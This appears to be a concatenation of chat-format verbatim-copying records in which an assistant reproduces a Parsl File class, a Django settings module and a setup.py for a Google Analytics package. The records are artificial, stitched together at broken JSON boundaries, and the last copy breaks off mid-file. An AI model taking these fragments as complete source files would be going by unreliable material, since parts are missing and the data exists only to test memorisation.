"content": "Write the code verbatim:\n<|memory_start|>```python\n\"\"\"Define the File Type.\n\nThe primary purpose of the File object is to track the protocol to be used\nto transfer the file as well as to give the appropriate filepath depending\non where (client-side, remote-side, intermediary-side) the File.filepath is\nbeing called from.\n\"\"\"\n\nimport os\nimport logging\nfrom urllib.parse import urlparse\nfrom parsl.data_provider.data_manager import DataManager\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass File(str):\n \"\"\"The Parsl File Class.\n\n This class captures various attributes of a file, and relies on client-side and\n worker-side systems to enable to appropriate transfer of files.\n\n Note that an error will be raised if one tries to create a File without an\n associated DataManager. That DataManager may be specified explicitly\n as a parameter to the File constructor, or may be implicitly specified via\n a previously loaded Parsl config.\n\n A File which is not associated with a DataManager is ill-defined.\n\n \"\"\"\n\n def __init__(self, url, dman=None, cache=False, caching_dir=\".\"):\n \"\"\"Construct a File object from a url string.\n\n Args:\n - url (string) : url string of the file e.g.\n - 'input.txt'\n - 'file:///scratch/proj101/input.txt'\n - 'globus://go#ep1/~/data/input.txt'\n - 'globus://ddb59aef-6d04-11e5-ba46-22000b92c6ec/home/johndoe/data/input.txt'\n - dman (DataManager) : data manager\n \"\"\"\n self.url = url\n parsed_url = urlparse(self.url)\n self.scheme = parsed_url.scheme if parsed_url.scheme else 'file'\n self.netloc = parsed_url.netloc\n self.path = parsed_url.path\n self.filename = os.path.basename(self.path)\n self.dman = dman if dman else DataManager.get_data_manager()\n self.data_future = {}\n if self.scheme == 'globus':\n self.dman.add_file(self)\n\n self.cache = cache\n self.caching_dir = caching_dir\n\n def __str__(self):\n return self.filepath\n\n def __repr__(self):\n return self.__str__()\n\n def __fspath__(self):\n return self.filepath\n\n def is_remote(self):\n if self.scheme in ['ftp', 'http', 'https', 'globus']:\n return True\n elif self.scheme in ['file']: # TODO: is this enough?\n return False\n else:\n raise Exception('Cannot determine if unknown file scheme {} is remote'.format(self.scheme))\n\n @property\n def filepath(self):\n \"\"\"Return the resolved filepath on the side where it is called from.\n\n The appropriate filepath will be returned when called from within\n an app running remotely as well as regular python on the client side.\n\n Args:\n - self\n Returns:\n - filepath (string)\n \"\"\"\n if self.scheme in ['ftp', 'http', 'https', 'globus']:\n # The path returned here has to match exactly with where the\n if hasattr(self, 'local_path'):\n return self.local_path\n else:\n return self.filename\n elif self.scheme in ['file']:\n return self.path\n else:\n raise Exception('Cannot return filepath for unknown scheme {}'.format(self.scheme))\n\n def stage_in(self, executor):\n \"\"\"Transport file from the input source to the executor.\n\n Args:\n - executor (str) - executor the file is staged in to.\n\n \"\"\"\n\n return self.dman.stage_in(self, executor)\n\n def stage_out(self, executor=None):\n \"\"\"Transport file from executor to final output destination.\"\"\"\n return self.dman.stage_out(self, executor)\n\n def set_data_future(self, df, executor=None):\n self.data_future[executor] = df\n\n def get_data_future(self, executor):\n return self.data_future.get(executor)\n\n def __getstate__(self):\n \"\"\"Override the default pickling method.\n\n The File object gets pickled and transmitted to remote executors during app\n execution. This enables pickling while retaining the lockable resources\n to the DFK/Client side.\n \"\"\"\n\n state = self.__dict__.copy()\n\n # We have already made a copy of the future objects, they are now no longer\n # reliable as means to wait for the staging events\n for executor in state[\"data_future\"]:\n # This is assumed to be safe, since the data_future represents staging to a specific executor\n # and an executor will only have one filepath.\n state[\"data_future\"][executor] = state[\"data_future\"][executor].filepath\n\n state[\"dman\"] = None\n\n return state\n\n def __setstate__(self, state):\n \"\"\" Overloading the default pickle method to reconstruct a File from serialized form\n\n This might require knowledge of whether a DataManager is already present in the context.\n \"\"\"\n self.__dict__.update(state)\n\n\nif __name__ == '__main__':\n\n x = File('./files.py')\n```<|memory_end|>\nDo not add anything else.",
"role": "user"
}
] |
```python
"""Define the File Type.
The primary purpose of the File object is to track the protocol to be used
to transfer the file as well as to give the appropriate filepath depending
on where (client-side, remote-side, intermediary-side) the File.filepath is
being called from.
"""
import os
import logging
from urllib.parse import urlparse
from parsl.data_provider.data_manager import DataManager
logger = logging.getLogger(__name__)
class File(str):
"""The Parsl File Class.
This class captures various attributes of a file, and relies on client-side and
worker-side systems to enable to appropriate transfer of files.
Note that an error will be raised if one tries to create a File without an
associated DataManager. That DataManager may be specified explicitly
as a parameter to the File constructor, or may be implicitly specified via
a previously loaded Parsl config.
A File which is not associated with a DataManager is ill-defined.
"""
def __init__(self, url, dman=None, cache=False, caching_dir="."):
"""Construct a File object from a url string.
Args:
- url (string) : url string of the file e.g.
- 'input.txt'
- 'file:///scratch/proj101/input.txt'
- 'globus://go#ep1/~/data/input.txt'
- 'globus://ddb59aef-6d04-11e5-ba46-22000b92c6ec/home/johndoe/data/input.txt'
- dman (DataManager) : data manager
"""
self.url = url
parsed_url = urlparse(self.url)
self.scheme = parsed_url.scheme if parsed_url.scheme else 'file'
self.netloc = parsed_url.netloc
self.path = parsed_url.path
self.filename = os.path.basename(self.path)
self.dman = dman if dman else DataManager.get_data_manager()
self.data_future = {}
if self.scheme == 'globus':
self.dman.add_file(self)
self.cache = cache
self.caching_dir = caching_dir
def __str__(self):
return self.filepath
def __repr__(self):
return self.__str__()
def __fspath__(self):
return self.filepath
def is_remote(self):
if self.scheme in ['ftp', 'http', 'https', 'globus']:
return True
elif self.scheme in ['file']: # TODO: is this enough?
return False
else:
raise Exception('Cannot determine if unknown file scheme {} is remote'.format(self.scheme))
@property
def filepath(self):
"""Return the resolved filepath on the side where it is called from.
The appropriate filepath will be returned when called from within
an app running remotely as well as regular python on the client side.
Args:
- self
Returns:
- filepath (string)
"""
if self.scheme in ['ftp', 'http', 'https', 'globus']:
# The path returned here has to match exactly with where the
if hasattr(self, 'local_path'):
return self.local_path
else:
return self.filename
elif self.scheme in ['file']:
return self.path
else:
raise Exception('Cannot return filepath for unknown scheme {}'.format(self.scheme))
def stage_in(self, executor):
"""Transport file from the input source to the executor.
Args:
- executor (str) - executor the file is staged in to.
"""
return self.dman.stage_in(self, executor)
def stage_out(self, executor=None):
"""Transport file from executor to final output destination."""
return self.dman.stage_out(self, executor)
def set_data_future(self, df, executor=None):
self.data_future[executor] = df
def get_data_future(self, executor):
return self.data_future.get(executor)
def __getstate__(self):
"""Override the default pickling method.
The File object gets pickled and transmitted to remote executors during app
execution. This enables pickling while retaining the lockable resources
to the DFK/Client side.
"""
state = self.__dict__.copy()
# We have already made a copy of the future objects, they are now no longer
# reliable as means to wait for the staging events
for executor in state["data_future"]:
# This is assumed to be safe, since the data_future represents staging to a specific executor
# and an executor will only have one filepath.
state["data_future"][executor] = state["data_future"][executor].filepath
state["dman"] = None
return state
def __setstate__(self, state):
""" Overloading the default pickle method to reconstruct a File from serialized form
This might require knowledge of whether a DataManager is already present in the context.
"""
self.__dict__.update(state)
if __name__ == '__main__':
x = File('./files.py')
```
|
[
{
"content": "Write the code verbatim:\n```python\nimport os\nfrom django.contrib import messages\n\nSETTINGS_DIR = os.path.dirname(os.path.abspath(__file__))\nPROJECT_DIR = os.path.dirname(SETTINGS_DIR)\nBUILDOUT_DIR = os.path.dirname(PROJECT_DIR)\nVAR_DIR = os.path.join(BUILDOUT_DIR, \"var\")\n\n\n##########################################################################\n#\n# Secret settings\n#\n##########################################################################\n# If a secret_settings file isn't defined, open a new one and save a\n# SECRET_KEY in it. Then import it. All passwords and other secret\n# settings should be stored in secret_settings.py. NOT in settings.py\ntry:\n from secret_settings import *\nexcept ImportError:\n print \"Couldn't find secret_settings.py file. Creating a new one.\"\n secret_path = os.path.join(SETTINGS_DIR, \"secret_settings.py\")\n with open(secret_path, 'w') as secret_settings:\n secret_key = ''.join([chr(ord(x) % 90 + 33) for x in os.urandom(40)])\n secret_settings.write(\"SECRET_KEY = '''%s'''\\n\" % secret_key)\n from secret_settings import *\n\n\n##########################################################################\n#\n# Authentication settings\n#\n##########################################################################\n\n# When a user successfully logs in, redirect here by default\nLOGIN_REDIRECT_URL = '/'\n\n# The address to redirect to when a user must authenticate\nLOGIN_URL = '/accounts/google/login/?process=login'\n\nACCOUNT_SIGNUP_FORM_CLASS = 'project.profiles.forms.SignupForm'\n\n# Require that users who are signing up provide an email address\nACCOUNT_EMAIL_REQUIRED = True\n\n# Don't store login tokens. We don't need them.\nSOCIALACCOUNT_STORE_TOKENS = False\n\n# Try to pull username/email from provider.\nSOCIALACCOUNT_AUTO_SIGNUP = False\n\nSOCIALACCOUNT_PROVIDERS = {\n 'google': {\n 'SCOPE': ['profile', 'email'],\n 'AUTH_PARAMS': { 'access_type': 'online' }\n },\n}\n\nAUTHENTICATION_BACKENDS = (\n 'allauth.account.auth_backends.AuthenticationBackend',\n)\n\nABSOLUTE_URL_OVERRIDES = {\n 'auth.user': lambda u: \"/profile/%s/\" % u.username,\n}\n\n\n##########################################################################\n#\n# Email Settings\n#\n##########################################################################\n\n# These should be added to secret_settings.py\n\n# EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n# EMAIL_HOST = ''\n# EMAIL_PORT = 587\n# EMAIL_HOST_USER = ''\n# EMAIL_HOST_PASSWORD = ''\n# EMAIL_USE_TLS = True\n# DEFAULT_FROM_EMAIL = ''\n\n\n##########################################################################\n#\n# API settings\n#\n##########################################################################\n\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': (\n 'rest_framework.permissions.IsAuthenticated',\n )\n}\n\n\n##########################################################################\n#\n# Bleach settings\n#\n##########################################################################\nimport bleach\n\nALLOWED_HTML_TAGS = bleach.ALLOWED_TAGS + ['h1', 'h2', 'h3', 'p', 'img']\n\nALLOWED_HTML_ATTRS = bleach.ALLOWED_ATTRIBUTES\nALLOWED_HTML_ATTRS.update({\n 'img': ['src', 'alt'],\n})\n\n\n##########################################################################\n#\n# Crispy settings\n#\n##########################################################################\n\nCRISPY_TEMPLATE_PACK = \"bootstrap3\"\n\n\n##########################################################################\n#\n# Messages settings\n#\n##########################################################################\n\n# Change the default messgae tags to play nice with Bootstrap\nMESSAGE_TAGS = {\n messages.DEBUG: 'alert-info',\n messages.INFO: 'alert-info',\n messages.SUCCESS: 'alert-success',\n messages.WARNING: 'alert-warning',\n messages.ERROR: 'alert-danger',\n}\n\n\n##########################################################################\n#\n# Database settings\n#\n##########################################################################\n\n# Should be overridden by development.py or production.py\nDATABASES = None\n\n\n##########################################################################\n#\n# Location settings\n#\n##########################################################################\n\nTIME_ZONE = 'America/Chicago'\nLANGUAGE_CODE = 'en-us'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n\n##########################################################################\n#\n# Static files settings\n#\n##########################################################################\nMEDIA_ROOT = os.path.join(VAR_DIR, \"uploads\")\nMEDIA_URL = '/uploads/'\n\nSTATIC_ROOT = os.path.join(VAR_DIR, \"static\")\nSTATIC_URL = '/static/'\n\nADMIN_MEDIA_PREFIX = '/static/admin/'\n\nSTATICFILES_DIRS = (\n os.path.join(PROJECT_DIR, \"static\"),\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder',\n)\n\nCOMPRESS_PRECOMPILERS = (\n ('text/coffeescript', 'coffee --compile --stdio'),\n ('text/x-sass', 'sass {infile} {outfile}'),\n ('text/x-scss', 'sass --scss {infile} {outfile}'),\n)\n\nCOMPRESS_ENABLED = True\n\n##########################################################################\n#\n# Template settings\n#\n##########################################################################\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(PROJECT_DIR, \"templates\")],\n 'OPTIONS': {\n 'context_processors': [\n # Django\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'django.template.context_processors.csrf',\n 'django.template.context_processors.debug',\n 'django.template.context_processors.media',\n 'django.template.context_processors.request',\n 'django.template.context_processors.static',\n ],\n 'loaders': [\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n 'django.template.loaders.eggs.Loader',\n ]\n },\n },\n]\n\n\n##########################################################################\n#\n# Middleware settings\n#\n##########################################################################\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n)\n\n\n##########################################################################\n#\n# URL settings\n#\n##########################################################################\n\nROOT_URLCONF = 'project.project.urls'\n\n\n##########################################################################\n#\n# Installed apps settings\n#\n##########################################################################\n\nINSTALLED_APPS = (\n # Django Content types *must* be first.\n 'django.contrib.contenttypes',\n\n # AllAuth\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n 'allauth.socialaccount.providers.google',\n\n # Admin Tools\n 'admin_tools',\n 'admin_tools.theming',\n 'admin_tools.menu',\n 'admin_tools.dashboard',\n\n # Django\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.messages',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.staticfiles',\n\n # Crispy Forms\n 'crispy_forms',\n\n # Rest Framework\n 'rest_framework',\n\n # Django Extensions\n 'django_extensions',\n\n # Compressor\n 'compressor',\n\n # H4H apps\n 'project.teams',\n 'project.profiles',\n 'project.submission',\n\n # Sentry client\n 'raven.contrib.django.raven_compat',\n)\n```\nDo not add anything else.",
"role": "user"
}
] |
[
{
"content": "Write the code verbatim:\n<|memory_start|>```python\nimport os\nfrom django.contrib import messages\n\nSETTINGS_DIR = os.path.dirname(os.path.abspath(__file__))\nPROJECT_DIR = os.path.dirname(SETTINGS_DIR)\nBUILDOUT_DIR = os.path.dirname(PROJECT_DIR)\nVAR_DIR = os.path.join(BUILDOUT_DIR, \"var\")\n\n\n##########################################################################\n#\n# Secret settings\n#\n##########################################################################\n# If a secret_settings file isn't defined, open a new one and save a\n# SECRET_KEY in it. Then import it. All passwords and other secret\n# settings should be stored in secret_settings.py. NOT in settings.py\ntry:\n from secret_settings import *\nexcept ImportError:\n print \"Couldn't find secret_settings.py file. Creating a new one.\"\n secret_path = os.path.join(SETTINGS_DIR, \"secret_settings.py\")\n with open(secret_path, 'w') as secret_settings:\n secret_key = ''.join([chr(ord(x) % 90 + 33) for x in os.urandom(40)])\n secret_settings.write(\"SECRET_KEY = '''%s'''\\n\" % secret_key)\n from secret_settings import *\n\n\n##########################################################################\n#\n# Authentication settings\n#\n##########################################################################\n\n# When a user successfully logs in, redirect here by default\nLOGIN_REDIRECT_URL = '/'\n\n# The address to redirect to when a user must authenticate\nLOGIN_URL = '/accounts/google/login/?process=login'\n\nACCOUNT_SIGNUP_FORM_CLASS = 'project.profiles.forms.SignupForm'\n\n# Require that users who are signing up provide an email address\nACCOUNT_EMAIL_REQUIRED = True\n\n# Don't store login tokens. We don't need them.\nSOCIALACCOUNT_STORE_TOKENS = False\n\n# Try to pull username/email from provider.\nSOCIALACCOUNT_AUTO_SIGNUP = False\n\nSOCIALACCOUNT_PROVIDERS = {\n 'google': {\n 'SCOPE': ['profile', 'email'],\n 'AUTH_PARAMS': { 'access_type': 'online' }\n },\n}\n\nAUTHENTICATION_BACKENDS = (\n 'allauth.account.auth_backends.AuthenticationBackend',\n)\n\nABSOLUTE_URL_OVERRIDES = {\n 'auth.user': lambda u: \"/profile/%s/\" % u.username,\n}\n\n\n##########################################################################\n#\n# Email Settings\n#\n##########################################################################\n\n# These should be added to secret_settings.py\n\n# EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n# EMAIL_HOST = ''\n# EMAIL_PORT = 587\n# EMAIL_HOST_USER = ''\n# EMAIL_HOST_PASSWORD = ''\n# EMAIL_USE_TLS = True\n# DEFAULT_FROM_EMAIL = ''\n\n\n##########################################################################\n#\n# API settings\n#\n##########################################################################\n\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': (\n 'rest_framework.permissions.IsAuthenticated',\n )\n}\n\n\n##########################################################################\n#\n# Bleach settings\n#\n##########################################################################\nimport bleach\n\nALLOWED_HTML_TAGS = bleach.ALLOWED_TAGS + ['h1', 'h2', 'h3', 'p', 'img']\n\nALLOWED_HTML_ATTRS = bleach.ALLOWED_ATTRIBUTES\nALLOWED_HTML_ATTRS.update({\n 'img': ['src', 'alt'],\n})\n\n\n##########################################################################\n#\n# Crispy settings\n#\n##########################################################################\n\nCRISPY_TEMPLATE_PACK = \"bootstrap3\"\n\n\n##########################################################################\n#\n# Messages settings\n#\n##########################################################################\n\n# Change the default messgae tags to play nice with Bootstrap\nMESSAGE_TAGS = {\n messages.DEBUG: 'alert-info',\n messages.INFO: 'alert-info',\n messages.SUCCESS: 'alert-success',\n messages.WARNING: 'alert-warning',\n messages.ERROR: 'alert-danger',\n}\n\n\n##########################################################################\n#\n# Database settings\n#\n##########################################################################\n\n# Should be overridden by development.py or production.py\nDATABASES = None\n\n\n##########################################################################\n#\n# Location settings\n#\n##########################################################################\n\nTIME_ZONE = 'America/Chicago'\nLANGUAGE_CODE = 'en-us'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n\n##########################################################################\n#\n# Static files settings\n#\n##########################################################################\nMEDIA_ROOT = os.path.join(VAR_DIR, \"uploads\")\nMEDIA_URL = '/uploads/'\n\nSTATIC_ROOT = os.path.join(VAR_DIR, \"static\")\nSTATIC_URL = '/static/'\n\nADMIN_MEDIA_PREFIX = '/static/admin/'\n\nSTATICFILES_DIRS = (\n os.path.join(PROJECT_DIR, \"static\"),\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder',\n)\n\nCOMPRESS_PRECOMPILERS = (\n ('text/coffeescript', 'coffee --compile --stdio'),\n ('text/x-sass', 'sass {infile} {outfile}'),\n ('text/x-scss', 'sass --scss {infile} {outfile}'),\n)\n\nCOMPRESS_ENABLED = True\n\n##########################################################################\n#\n# Template settings\n#\n##########################################################################\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(PROJECT_DIR, \"templates\")],\n 'OPTIONS': {\n 'context_processors': [\n # Django\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'django.template.context_processors.csrf',\n 'django.template.context_processors.debug',\n 'django.template.context_processors.media',\n 'django.template.context_processors.request',\n 'django.template.context_processors.static',\n ],\n 'loaders': [\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n 'django.template.loaders.eggs.Loader',\n ]\n },\n },\n]\n\n\n##########################################################################\n#\n# Middleware settings\n#\n##########################################################################\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n)\n\n\n##########################################################################\n#\n# URL settings\n#\n##########################################################################\n\nROOT_URLCONF = 'project.project.urls'\n\n\n##########################################################################\n#\n# Installed apps settings\n#\n##########################################################################\n\nINSTALLED_APPS = (\n # Django Content types *must* be first.\n 'django.contrib.contenttypes',\n\n # AllAuth\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n 'allauth.socialaccount.providers.google',\n\n # Admin Tools\n 'admin_tools',\n 'admin_tools.theming',\n 'admin_tools.menu',\n 'admin_tools.dashboard',\n\n # Django\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.messages',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.staticfiles',\n\n # Crispy Forms\n 'crispy_forms',\n\n # Rest Framework\n 'rest_framework',\n\n # Django Extensions\n 'django_extensions',\n\n # Compressor\n 'compressor',\n\n # H4H apps\n 'project.teams',\n 'project.profiles',\n 'project.submission',\n\n # Sentry client\n 'raven.contrib.django.raven_compat',\n)\n```<|memory_end|>\nDo not add anything else.",
"role": "user"
}
] |
```python
import os
from django.contrib import messages
SETTINGS_DIR = os.path.dirname(os.path.abspath(__file__))
PROJECT_DIR = os.path.dirname(SETTINGS_DIR)
BUILDOUT_DIR = os.path.dirname(PROJECT_DIR)
VAR_DIR = os.path.join(BUILDOUT_DIR, "var")
##########################################################################
#
# Secret settings
#
##########################################################################
# If a secret_settings file isn't defined, open a new one and save a
# SECRET_KEY in it. Then import it. All passwords and other secret
# settings should be stored in secret_settings.py. NOT in settings.py
try:
from secret_settings import *
except ImportError:
print "Couldn't find secret_settings.py file. Creating a new one."
secret_path = os.path.join(SETTINGS_DIR, "secret_settings.py")
with open(secret_path, 'w') as secret_settings:
secret_key = ''.join([chr(ord(x) % 90 + 33) for x in os.urandom(40)])
secret_settings.write("SECRET_KEY = '''%s'''\n" % secret_key)
from secret_settings import *
##########################################################################
#
# Authentication settings
#
##########################################################################
# When a user successfully logs in, redirect here by default
LOGIN_REDIRECT_URL = '/'
# The address to redirect to when a user must authenticate
LOGIN_URL = '/accounts/google/login/?process=login'
ACCOUNT_SIGNUP_FORM_CLASS = 'project.profiles.forms.SignupForm'
# Require that users who are signing up provide an email address
ACCOUNT_EMAIL_REQUIRED = True
# Don't store login tokens. We don't need them.
SOCIALACCOUNT_STORE_TOKENS = False
# Try to pull username/email from provider.
SOCIALACCOUNT_AUTO_SIGNUP = False
SOCIALACCOUNT_PROVIDERS = {
'google': {
'SCOPE': ['profile', 'email'],
'AUTH_PARAMS': { 'access_type': 'online' }
},
}
AUTHENTICATION_BACKENDS = (
'allauth.account.auth_backends.AuthenticationBackend',
)
ABSOLUTE_URL_OVERRIDES = {
'auth.user': lambda u: "/profile/%s/" % u.username,
}
##########################################################################
#
# Email Settings
#
##########################################################################
# These should be added to secret_settings.py
# EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# EMAIL_HOST = ''
# EMAIL_PORT = 587
# EMAIL_HOST_USER = ''
# EMAIL_HOST_PASSWORD = ''
# EMAIL_USE_TLS = True
# DEFAULT_FROM_EMAIL = ''
##########################################################################
#
# API settings
#
##########################################################################
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
)
}
##########################################################################
#
# Bleach settings
#
##########################################################################
import bleach
ALLOWED_HTML_TAGS = bleach.ALLOWED_TAGS + ['h1', 'h2', 'h3', 'p', 'img']
ALLOWED_HTML_ATTRS = bleach.ALLOWED_ATTRIBUTES
ALLOWED_HTML_ATTRS.update({
'img': ['src', 'alt'],
})
##########################################################################
#
# Crispy settings
#
##########################################################################
CRISPY_TEMPLATE_PACK = "bootstrap3"
##########################################################################
#
# Messages settings
#
##########################################################################
# Change the default messgae tags to play nice with Bootstrap
MESSAGE_TAGS = {
messages.DEBUG: 'alert-info',
messages.INFO: 'alert-info',
messages.SUCCESS: 'alert-success',
messages.WARNING: 'alert-warning',
messages.ERROR: 'alert-danger',
}
##########################################################################
#
# Database settings
#
##########################################################################
# Should be overridden by development.py or production.py
DATABASES = None
##########################################################################
#
# Location settings
#
##########################################################################
TIME_ZONE = 'America/Chicago'
LANGUAGE_CODE = 'en-us'
USE_I18N = True
USE_L10N = True
USE_TZ = True
##########################################################################
#
# Static files settings
#
##########################################################################
MEDIA_ROOT = os.path.join(VAR_DIR, "uploads")
MEDIA_URL = '/uploads/'
STATIC_ROOT = os.path.join(VAR_DIR, "static")
STATIC_URL = '/static/'
ADMIN_MEDIA_PREFIX = '/static/admin/'
STATICFILES_DIRS = (
os.path.join(PROJECT_DIR, "static"),
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
COMPRESS_PRECOMPILERS = (
('text/coffeescript', 'coffee --compile --stdio'),
('text/x-sass', 'sass {infile} {outfile}'),
('text/x-scss', 'sass --scss {infile} {outfile}'),
)
COMPRESS_ENABLED = True
##########################################################################
#
# Template settings
#
##########################################################################
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(PROJECT_DIR, "templates")],
'OPTIONS': {
'context_processors': [
# Django
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.csrf',
'django.template.context_processors.debug',
'django.template.context_processors.media',
'django.template.context_processors.request',
'django.template.context_processors.static',
],
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
]
},
},
]
##########################################################################
#
# Middleware settings
#
##########################################################################
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
##########################################################################
#
# URL settings
#
##########################################################################
ROOT_URLCONF = 'project.project.urls'
##########################################################################
#
# Installed apps settings
#
##########################################################################
INSTALLED_APPS = (
# Django Content types *must* be first.
'django.contrib.contenttypes',
# AllAuth
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
# Admin Tools
'admin_tools',
'admin_tools.theming',
'admin_tools.menu',
'admin_tools.dashboard',
# Django
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
# Crispy Forms
'crispy_forms',
# Rest Framework
'rest_framework',
# Django Extensions
'django_extensions',
# Compressor
'compressor',
# H4H apps
'project.teams',
'project.profiles',
'project.submission',
# Sentry client
'raven.contrib.django.raven_compat',
)
```
|
[
{
"content": "Produce an exact reconstruction of the code:\n```python\nfrom setuptools import setup # Always prefer setuptools over distutils\nimport os\n\nREADME = open(os.path.join(os.path.dirname(__file__), 'README.md')).read()\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nsetup(\n name='django-ga-puller',\n version='0.1.6',\n packages=['ga_puller', 'ga_puller.management', 'ga_puller.management.commands'],\n include_package_data=True,\n license='MIT License',\n description='Django app used to pull daily Google Analytics data into your django database.',\n long_description=README,\n url='https://github.com/CIGIHub/django-ga-puller/',\n author='Caroline Simpson',\n author_email='[email protected]',\n install_requires=[\n 'google-api-python-client >= 1.2',\n 'pycrypto >= 2.6.1',\n ],\n setup_requires=[\n 'google-api-python-client >= 1.2',\n 'pycrypto >= 2.6.1',\n ],\n classifiers=[\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Topic :: Internet :: WWW/HTTP',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n ],\n)\n```\nCharacter-for-character where possible.",
"role": "user"
}
] |
[
{
"content": "Produce an exact reconstruction of the code:\n<|memory_start|>```python\nfrom setuptools import setup # Always prefer setuptools over distutils\nimport os\n\nREADME = open(os.path.join(os.path.dirname(__file__), 'README.md')).read()\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nsetup(\n name='django-ga-puller',\n version='0.1.6',\n packages=['ga_puller', 'ga_puller.management', 'ga_puller.management.commands'],\n include_package_data=True,\n license='MIT License',\n description='Django app used to pull daily Google Analytics data into your django database.',\n long_description=README,\n url='https://github.com/CIGIHub/django-ga-puller/',\n author='Caroline Simpson',\n author_email='[email protected]',\n install_requires=[\n 'google-api-python-client >= 1.2',\n 'pycrypto >= 2.6.1',\n ],\n setup_requires=[\n 'google-api-python-client >= 1.2',\n 'pycrypto >= 2.6.1',\n ],\n classifiers=[\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Topic :: Internet :: WWW/HTTP',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n ],\n)\n```<|memory_end|>\nCharacter-for-character where possible.",
"role": "user"
}
] |
```python
from setuptools import setup # Always prefer setuptools over distutils
import os
README = open(os.path.join(os.path.dirname(__file__), 'README.md')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='django-ga-puller',
version='0.1.6',
packages=['ga_puller', 'ga_puller.management', 'ga_puller.management.commands'],
include_package_data=True,
license='MIT License',
description='Django app used to pull daily Google Analytics data into your django database.',
long_description=README,
url='https://github.com/CIGIHub/django-ga-puller/',
author='Caroline Simpson',
author_email='[email protected]',
install_requires=[
'google-api-python-client >= 1.2',
'pycrypto >= 2.6.1',
],
setup_requires=[
'google-api-python-client >= 1.2',
'pycrypto >= 2.6.1',
],
classifiers=[
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Topic :: Internet :: WWW/HTTP',
